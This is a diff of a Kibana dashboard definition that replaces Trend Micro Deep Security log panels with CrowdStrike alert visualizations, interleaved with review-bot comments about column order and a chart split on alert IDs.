false } ], - "shape": "donut" + "layerId": "986a7419-3b29-4812-8f1e-8648d18ce08b", + "layerType": "data" } }, "title": "", "type": "lens", - "visualizationType": "lnsPie" + "visualizationType": "lnsDatatable" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { "h": 15, - "i": "f2a5a219-78b4-4901-b93b-aefe163b43c6", + "i": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8", "w": 24, - "x": 24, - "y": 15 + "x": 0, + "y": 16 }, - "panelIndex": "f2a5a219-78b4-4901-b93b-aefe163b43c6", - "title": "Deep Security Logs % by Trend Micro Top 10 Signature ID", + "panelIndex": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8", + "title": "User with Highest Alert [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "82644959-ef2b-4640-a0ca-d45036d96764", "type": "index-pattern" } ], @@ -574,17 +522,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1": { "columnOrder": [ - "9825dc26-0dc2-49b8-a2db-334e9fec92d4", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "fe77febc-cfff-4f08-8c45-2d88cce7d7e8", + "1b066652-7743-4ca9-aea2-579f2a9ddd34" ], "columns": { - "9825dc26-0dc2-49b8-a2db-334e9fec92d4": { + "1b066652-7743-4ca9-aea2-579f2a9ddd34": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "fe77febc-cfff-4f08-8c45-2d88cce7d7e8": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Event Type", + "label": "Device ID", "operationType": "terms", "params": { "exclude": [], 
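Review bot: The datatable's displayed column order does not match the layer's column order, so the "User with Highest Alert" table will render as User ID, Count, User Name with the metric wedged between the two user fields. The layer's `columnOrder` lists the User ID, User Name and Count column IDs in that order, while `visualization.columns` lists `950aa189-…`, `029c6079-…`, `d59a23d4-…`. Moving the `{ "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", "isTransposed": false }` entry to the end of `visualization.columns` puts the count last, which is the conventional layout for a top-N table and matches the other panels that order bucket columns before the metric.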
@@ -593,7 +553,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "1b066652-7743-4ca9-aea2-579f2a9ddd34", "type": "column" }, "orderDirection": "desc", @@ -604,31 +564,46 @@ "size": 10 }, "scale": "ordinal", - "sourceField": "event.type" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "device.id" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "82644959-ef2b-4640-a0ca-d45036d96764", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -654,19 +629,19 @@ "layers": [ { "accessors": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "1b066652-7743-4ca9-aea2-579f2a9ddd34" ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "layerId": "6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1", "layerType": "data", - "position": "top", "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "9825dc26-0dc2-49b8-a2db-334e9fec92d4" + "xAccessor": "fe77febc-cfff-4f08-8c45-2d88cce7d7e8" } ], "legend": { "isVisible": true, - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "tickLabelsVisibilitySettings": { 
@@ -686,23 +661,29 @@ }, "gridData": { "h": 15, - "i": "624b72c2-28f7-4245-89ad-c05025be1614", + "i": "aaa3ce74-8cbd-4e77-837e-cdbd42494339", "w": 24, - "x": 0, - "y": 45 + "x": 24, + "y": 16 }, - "panelIndex": "624b72c2-28f7-4245-89ad-c05025be1614", - "title": "Deep Security Logs Count by Top 10 Event Type", + "panelIndex": "aaa3ce74-8cbd-4e77-837e-cdbd42494339", + "title": "Alert over Device [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-3a2c2235-1a9e-4db6-ac43-2f05c6775021", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9040575b-9449-4f08-98ae-116d26ebf28d", "type": "index-pattern" } ], @@ -711,17 +692,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "3a2c2235-1a9e-4db6-ac43-2f05c6775021": { "columnOrder": [ - "2452aa0a-d551-493b-b053-13846361167e", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "3adbc15a-2906-40ff-9ea6-9eef981ea411", + "342509c6-75f8-409a-81eb-7d0cd1f6af5b" ], "columns": { - "2452aa0a-d551-493b-b053-13846361167e": { + "342509c6-75f8-409a-81eb-7d0cd1f6af5b": { "customLabel": true, - "dataType": "string", + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3adbc15a-2906-40ff-9ea6-9eef981ea411": { + "customLabel": true, + "dataType": "number", "isBucketed": true, - "label": "Trend Micro Event Name", + "label": "Event Severity", "operationType": "terms", "params": { "exclude": [], 
@@ -730,7 +723,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "342509c6-75f8-409a-81eb-7d0cd1f6af5b", "type": "column" }, "orderDirection": "desc", @@ -738,34 +731,49 @@ "parentFormat": { "id": "terms" }, - "size": 10 + "size": 5 }, "scale": "ordinal", - "sourceField": "trendmicro.event.name" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "% of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "event.severity" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9040575b-9449-4f08-98ae-116d26ebf28d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -775,20 +783,21 @@ "layers": [ { "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "layerId": "3a2c2235-1a9e-4db6-ac43-2f05c6775021", "layerType": "data", - "legendDisplay": "default", + "legendDisplay": "show", "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "342509c6-75f8-409a-81eb-7d0cd1f6af5b" ], "nestedLegend": false, "numberDisplay": "percent", "primaryGroups": [ - "2452aa0a-d551-493b-b053-13846361167e" - ] + "3adbc15a-2906-40ff-9ea6-9eef981ea411" + ], + "truncateLegend": false } ], - "shape": "donut" + "shape": "pie" } }, "title": "", 
@@ -800,23 +809,29 @@ }, "gridData": { "h": 15, - "i": "d5723b06-eb47-4af3-8d87-c70575293831", + "i": "14405add-afa0-4e3f-9efd-1f52fad51027", "w": 24, - "x": 24, - "y": 30 + "x": 0, + "y": 31 }, - "panelIndex": "d5723b06-eb47-4af3-8d87-c70575293831", - "title": "Deep Security Logs % by Trend Micro Top 10 Event Name", + "panelIndex": "14405add-afa0-4e3f-9efd-1f52fad51027", + "title": "Alert by Severity [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-a6424e3b-fc6e-460e-8385-5a410a690d34", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f2f6ede-7728-4214-a79c-27931101ec10", "type": "index-pattern" } ], @@ -825,17 +840,17 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "a6424e3b-fc6e-460e-8385-5a410a690d34": { "columnOrder": [ - "2452aa0a-d551-493b-b053-13846361167e", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "1aa38945-d8a3-4137-b91d-ca2b6f9b140a", + "40dcaef5-e4f3-47e9-8e51-748b882f17e1" ], "columns": { - "2452aa0a-d551-493b-b053-13846361167e": { + "1aa38945-d8a3-4137-b91d-ca2b6f9b140a": { "customLabel": true, - "dataType": "string", + "dataType": "ip", "isBucketed": true, - "label": "Trend Micro Event Name", + "label": "Host IP", "operationType": "terms", "params": { "exclude": [], @@ -844,7 +859,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "40dcaef5-e4f3-47e9-8e51-748b882f17e1", "type": "column" }, "orderDirection": "desc", 
@@ -855,75 +870,120 @@ "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.name" + "sourceField": "host.ip" }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { + "40dcaef5-e4f3-47e9-8e51-748b882f17e1": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "7f2f6ede-7728-4214-a79c-27931101ec10", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", "query": "" }, "visualization": { - "columns": [ - { - "columnId": "2452aa0a-d551-493b-b053-13846361167e" - }, + "layers": [ { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "accessors": [ + "40dcaef5-e4f3-47e9-8e51-748b882f17e1" + ], + "layerId": "a6424e3b-fc6e-460e-8385-5a410a690d34", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "1aa38945-d8a3-4137-b91d-ca2b6f9b140a" } ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data" + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" } }, "title": "", "type": "lens", - "visualizationType": "lnsDatatable" + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": 
false }, "gridData": { "h": 15, - "i": "8609ed1c-8415-4912-8ff7-75ca89c9afbc", + "i": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4", "w": 24, - "x": 0, - "y": 30 + "x": 24, + "y": 31 }, - "panelIndex": "8609ed1c-8415-4912-8ff7-75ca89c9afbc", - "title": "Deep Security Logs % by Trend Micro Top 10 Event Name (copy)", + "panelIndex": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4", + "title": "Alert over Host IP [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-e83ee069-a761-49ed-878d-c9972e55a388", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9a07642d-eec9-4213-b1ae-bb5adbbcf25c", "type": "index-pattern" } ], @@ -932,17 +992,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "e83ee069-a761-49ed-878d-c9972e55a388": { "columnOrder": [ - "9825dc26-0dc2-49b8-a2db-334e9fec92d4", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "910bf38d-80f2-4783-9e71-d8bb53f06700", + "0465e312-67ef-4386-941e-55db68a8b075" ], "columns": { - "9825dc26-0dc2-49b8-a2db-334e9fec92d4": { + "0465e312-67ef-4386-941e-55db68a8b075": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "910bf38d-80f2-4783-9e71-d8bb53f06700": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Event Type", + "label": "Hostname", "operationType": "terms", "params": { "exclude": [], @@ -951,7 +1023,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "0465e312-67ef-4386-941e-55db68a8b075", "type": "column" }, "orderDirection": "desc", 
@@ -959,34 +1031,50 @@ "parentFormat": { "id": "terms" }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "event.type" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "host.hostname" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9a07642d-eec9-4213-b1ae-bb5adbbcf25c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", 
@@ -995,49 +1083,58 @@ "visualization": { "layers": [ { - "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "accessors": [ + "0465e312-67ef-4386-941e-55db68a8b075" ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "9825dc26-0dc2-49b8-a2db-334e9fec92d4" - ] + "layerId": "e83ee069-a761-49ed-878d-c9972e55a388", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "910bf38d-80f2-4783-9e71-d8bb53f06700" } ], - "shape": "donut" + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" } }, "title": "", "type": "lens", - "visualizationType": "lnsPie" + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { "h": 15, - "i": "6849145b-2219-4b62-a2c1-f6293bf5b6b7", + "i": "69f87d85-d0f2-4fb3-9e02-e970098547db", "w": 24, - "x": 24, - "y": 45 + "x": 0, + "y": 46 }, - "panelIndex": "6849145b-2219-4b62-a2c1-f6293bf5b6b7", - "title": "Deep Security Logs % by Top 10 Event Type", + "panelIndex": "69f87d85-d0f2-4fb3-9e02-e970098547db", + "title": "Alert over Hostname [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "indexpattern-datasource-layer-4e7a254a-d432-4988-a5cb-3de38f841cc9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d887537f-f1fd-404b-8327-8bf3b0d1fdfe", "type": "index-pattern" } ], 
@@ -1046,29 +1143,30 @@ "datasourceStates": { "formBased": { "layers": { - "db75efdc-f99e-44e6-96a4-4a2d509b8e39": { + "4e7a254a-d432-4988-a5cb-3de38f841cc9": { "columnOrder": [ - "340a534e-abeb-424e-b0e9-7f7fec891092", - "e98b9563-cb2a-412f-9360-b55bbb9001fb", - "0381cb47-eb28-4ae7-9dda-80de21332f97" + "91fec88d-308d-4dbd-a1a9-241d26c4f894", + "fed2b0eb-a506-462a-af98-71f79762262e", + "18a23919-ca9b-4787-8eb1-b6fac3faa5b6" ], "columns": { - "0381cb47-eb28-4ae7-9dda-80de21332f97": { + "18a23919-ca9b-4787-8eb1-b6fac3faa5b6": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" }, - "340a534e-abeb-424e-b0e9-7f7fec891092": { + "91fec88d-308d-4dbd-a1a9-241d26c4f894": { + "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Top 10 values of trendmicro.event.category", + "label": "Event ID", "operationType": "terms", "params": { "exclude": [], @@ -1077,23 +1175,24 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "0381cb47-eb28-4ae7-9dda-80de21332f97", + "columnId": "18a23919-ca9b-4787-8eb1-b6fac3faa5b6", "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.category" + "sourceField": "event.id" }, - "e98b9563-cb2a-412f-9360-b55bbb9001fb": { + "fed2b0eb-a506-462a-af98-71f79762262e": { + "customLabel": true, "dataType": "date", "isBucketed": true, - "label": "@timestamp", + "label": "Timestamp", "operationType": "date_histogram", "params": { "dropPartials": false, 
@@ -1104,63 +1203,73 @@ "sourceField": "@timestamp" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d887537f-f1fd-404b-8327-8bf3b0d1fdfe", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset : \"trendmicro.deep_security\" " + "query": "" }, "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, "layers": [ { "accessors": [ - "0381cb47-eb28-4ae7-9dda-80de21332f97" + "18a23919-ca9b-4787-8eb1-b6fac3faa5b6" ], - "layerId": "db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "layerId": "4e7a254a-d432-4988-a5cb-3de38f841cc9", "layerType": "data", "position": "top", - "seriesType": "bar_stacked", + "seriesType": "line", "showGridlines": false, - "splitAccessor": "340a534e-abeb-424e-b0e9-7f7fec891092", - "xAccessor": "e98b9563-cb2a-412f-9360-b55bbb9001fb" + "splitAccessor": "91fec88d-308d-4dbd-a1a9-241d26c4f894", + "xAccessor": "fed2b0eb-a506-462a-af98-71f79762262e" } ], "legend": { "isVisible": true, - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" + "preferredSeriesType": "line", + "title": "Empty XY chart", + 
"valueLabels": "hide", + "valuesInLegend": true } }, "title": "", @@ -1171,24 +1280,30 @@ "hidePanelTitles": false }, "gridData": { - "h": 9, - "i": "b0d62dc8-340c-4335-bc6a-162a9d8492b5", - "w": 48, - "x": 0, - "y": 60 + "h": 15, + "i": "940c98f0-56e7-4e29-88d2-07f160f579cb", + "w": 24, + "x": 24, + "y": 46 }, - "panelIndex": "b0d62dc8-340c-4335-bc6a-162a9d8492b5", - "title": "Timeline of logs count by Trend Micro Event Category", + "panelIndex": "940c98f0-56e7-4e29-88d2-07f160f579cb", + "title": "Alert over Timestamp [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "indexpattern-datasource-layer-a278b2d5-076e-409c-b9ca-2da50d6d0a09", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bbcb4d86-6890-474c-9975-f1476711cfad", "type": "index-pattern" } ], 
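Review bot: The "Alert over Timestamp" line chart splits the series on the `event.id` column (`splitAccessor` → `91fec88d-…`, whose `sourceField` is `event.id` with a terms `size` of 10), so the panel will only ever show the ten most frequent alert IDs rather than a timeline of all alerts. If `event.id` is unique per CrowdStrike alert, which seems likely but is not visible from this file, each of those ten series is a single point and the chart conveys almost nothing. Dropping the split (remove `"splitAccessor"` and the `event.id` column from `columnOrder`) gives a plain count-over-time, or splitting on a low-cardinality field the dashboard already uses, such as `event.severity`, gives a meaningful breakdown. The leftover `"title": "Empty XY chart"` in the visualization state is Lens's default and is not rendered, but it is worth clearing to `""` for consistency with the other panels.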
@@ -1197,52 +1312,87 @@ "datasourceStates": { "formBased": { "layers": { - "db75efdc-f99e-44e6-96a4-4a2d509b8e39": { + "a278b2d5-076e-409c-b9ca-2da50d6d0a09": { "columnOrder": [ - "e98b9563-cb2a-412f-9360-b55bbb9001fb", - "ca9e6197-9ec4-4b01-85e0-1cc0efbaf582" + "5e0dee9c-395c-42a3-827b-9b796ecdd625", + "0d2426f2-1b70-47e2-84b2-5f36d948dc98" ], "columns": { - "ca9e6197-9ec4-4b01-85e0-1cc0efbaf582": { + "0d2426f2-1b70-47e2-84b2-5f36d948dc98": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" }, - "e98b9563-cb2a-412f-9360-b55bbb9001fb": { - "dataType": "date", + "5e0dee9c-395c-42a3-827b-9b796ecdd625": { + "customLabel": true, + "dataType": "number", "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", + "label": "Confidence", + "operationType": "range", "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" + "includeEmptyRows": false, + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" }, "scale": "interval", - "sourceField": "@timestamp" + "sourceField": "crowdstrike.alert.confidence" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "bbcb4d86-6890-474c-9975-f1476711cfad", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset : 
\"trendmicro.deep_security\" " + "query": "" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1264,27 +1414,30 @@ "layers": [ { "accessors": [ - "ca9e6197-9ec4-4b01-85e0-1cc0efbaf582" + "0d2426f2-1b70-47e2-84b2-5f36d948dc98" ], - "layerId": "db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "layerId": "a278b2d5-076e-409c-b9ca-2da50d6d0a09", "layerType": "data", "position": "top", - "seriesType": "bar_stacked", + "seriesType": "bar_horizontal", "showGridlines": false, - "xAccessor": "e98b9563-cb2a-412f-9360-b55bbb9001fb" + "xAccessor": "5e0dee9c-395c-42a3-827b-9b796ecdd625" } ], "legend": { "isVisible": true, - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false }, - "preferredSeriesType": "bar_stacked", + "preferredSeriesType": "bar_horizontal", "tickLabelsVisibilitySettings": { "x": true, "yLeft": true, "yRight": true }, - "valueLabels": "hide" + "valueLabels": "hide", + "valuesInLegend": false } }, "title": "", 
@@ -1295,101 +1448,123 @@ "hidePanelTitles": false }, "gridData": { - "h": 9, - "i": "4d910743-c246-4636-b806-db0e707f9814", + "h": 17, + "i": "9af8495e-c5fb-4fee-ae54-1fffa46a4401", "w": 48, "x": 0, - "y": 69 + "y": 61 }, - "panelIndex": "4d910743-c246-4636-b806-db0e707f9814", - "title": "Timeline of all logs count", + "panelIndex": "9af8495e-c5fb-4fee-ae54-1fffa46a4401", + "title": "Alert over Confidence [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" } ], "timeRestore": false, - "title": "[Trend Micro] Deep Security Logs Overview", + "title": "[Logs CrowdStrike] Alert", "version": 1 }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-20T05:44:13.346Z", + "id": "crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c", + "managed": false, "references": [ { "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "name": "cf48b7df-a51b-4a21-a2f9-c4c05705b5eb:indexpattern-datasource-layer-836a096e-11de-4f16-8dc1-08de3e3a2b2f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc:indexpattern-datasource-layer-b4403946-8fa4-464f-b1e2-17fae6304bb5", "type": "index-pattern" }, { "id": "logs-*", - "name": "afb76ed5-df93-4649-a1d8-ee7586c483dd:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc:5c9cfcd1-2c7f-493f-86a5-002bcf501fde", "type": "index-pattern" }, { "id": "logs-*", - "name": "813d3531-d392-4310-a30e-255453a47462:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8:indexpattern-datasource-layer-986a7419-3b29-4812-8f1e-8648d18ce08b", "type": "index-pattern" }, { "id": "logs-*", - "name": "5f13ec5c-aee1-4dde-92df-8cbe0ecaa7e2:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8:db8d1eab-6c1e-4d8a-9efa-1f7407fc28bf", "type": "index-pattern" }, { "id": 
"logs-*", - "name": "f2a5a219-78b4-4901-b93b-aefe163b43c6:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "aaa3ce74-8cbd-4e77-837e-cdbd42494339:indexpattern-datasource-layer-6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1", "type": "index-pattern" }, { "id": "logs-*", - "name": "624b72c2-28f7-4245-89ad-c05025be1614:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "aaa3ce74-8cbd-4e77-837e-cdbd42494339:82644959-ef2b-4640-a0ca-d45036d96764", "type": "index-pattern" }, { "id": "logs-*", - "name": "d5723b06-eb47-4af3-8d87-c70575293831:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "14405add-afa0-4e3f-9efd-1f52fad51027:indexpattern-datasource-layer-3a2c2235-1a9e-4db6-ac43-2f05c6775021", "type": "index-pattern" }, { "id": "logs-*", - "name": "8609ed1c-8415-4912-8ff7-75ca89c9afbc:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "14405add-afa0-4e3f-9efd-1f52fad51027:9040575b-9449-4f08-98ae-116d26ebf28d", "type": "index-pattern" }, { "id": "logs-*", - "name": "6849145b-2219-4b62-a2c1-f6293bf5b6b7:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": 